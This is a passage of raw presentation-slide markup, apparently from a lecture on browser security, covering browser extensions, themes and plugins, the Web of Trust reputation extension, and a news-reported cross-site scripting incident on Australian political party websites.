              <a:t>Addons, Plugins or </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="0" dirty="0"/>
              <a:t>Extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="5" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1431289" y="1517318"/>
            <a:ext cx="5239385" cy="838835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306070" indent="-293370">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="710"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="306070" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Addons </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-9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:</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306070" indent="-293370">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="509"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="305435" algn="l"/>
                <a:tab pos="306070" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Extensions </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>extend browser's </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>functionality</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-18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:</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constant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431289" y="3543553"/>
            <a:ext cx="486092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06070" indent="-293370">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="305435" algn="l"/>
                <a:tab pos="306070" algn="l"/>
              </a:tabLst>
            </a:pP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Themes </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>modify </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the look of the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-28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:</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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431289" y="5061458"/>
            <a:ext cx="7582534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06070" marR="5080" indent="-293370">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="305435" algn="l"/>
                <a:tab pos="306070" algn="l"/>
              </a:tabLst>
            </a:pP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Plugins </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>: link the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>browser </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>external programs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>that handle </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>files </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>render (audio, video, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>flash,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15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pdf...)</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306070" marR="6350" indent="-293370">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="305435" algn="l"/>
                <a:tab pos="306070" algn="l"/>
                <a:tab pos="1580515" algn="l"/>
                <a:tab pos="2034539" algn="l"/>
                <a:tab pos="3236595" algn="l"/>
                <a:tab pos="4273550" algn="l"/>
                <a:tab pos="5318125" algn="l"/>
                <a:tab pos="6922134" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>amples</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-50" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ommon</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>plugins</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>nclude</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ac</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>omedia</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Flash,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Silverlight, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Apple </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Quicktime, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Adobe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-175" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Reader,...</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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417570" y="2514600"/>
            <a:ext cx="3689603" cy="97688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14400" y="4181855"/>
            <a:ext cx="3918203" cy="6309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410200" y="4038600"/>
            <a:ext cx="3918965" cy="64846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78</a:t>
            </a:fld>
            <a:endParaRPr dirty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902461" y="6973316"/>
            <a:ext cx="22732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45C75"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="045C75"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="045C75"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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922779" y="700532"/>
            <a:ext cx="6146165" cy="5791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600" spc="10" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="0" dirty="0"/>
              <a:t>popular </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" dirty="0"/>
              <a:t>extension </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-5" dirty="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-25" dirty="0"/>
              <a:t>Firefox</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1092200" y="1439594"/>
            <a:ext cx="6323965" cy="1570355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306705" indent="-294005">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="710"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="43750"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="307340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Trust (WOT) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(34,226,100</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-145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downloads)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="698500" lvl="1" indent="-293370">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="509"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="697865" algn="l"/>
                <a:tab pos="698500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>website </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>reputation </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>rating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-19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tool</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="698500" lvl="1" indent="-293370">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="697865" algn="l"/>
                <a:tab pos="698500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>allows </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>users </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to rate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-305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websites</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="698500" lvl="1" indent="-293370">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="697865" algn="l"/>
                <a:tab pos="698500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>shows </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>which site </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-33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trust</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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029200" y="3738372"/>
            <a:ext cx="4082796" cy="282549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594096" y="6568692"/>
            <a:ext cx="2953385" cy="2743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600" i="1" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>website with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>poor</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="-20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="0" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>reputation</a:t>
            </a:r>
            <a:endParaRPr sz="16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84098" y="3755135"/>
            <a:ext cx="4082796" cy="27767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407667" y="6568692"/>
            <a:ext cx="2999740" cy="2743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600" i="1" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>website with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>good</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="0" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>reputation</a:t>
            </a:r>
            <a:endParaRPr sz="1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436624" y="654811"/>
            <a:ext cx="718756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Example </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>incident: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>Information</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="125" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>modification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909827" y="1595627"/>
            <a:ext cx="7881366" cy="36667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98702" y="5200142"/>
            <a:ext cx="7433309" cy="14293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4465" marR="431800">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-90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45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-85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10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>sites</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-90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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="15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10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Australia's</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-55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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>two</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-60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major</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-95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political</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-35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parties</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-90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10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>contain</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-70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cross‐  site </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-110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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>flaws”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500">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080" indent="-635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.builderau.com.au/news/soa/XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>‐flaw‐makes‐PM‐say‐I‐want‐to‐  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
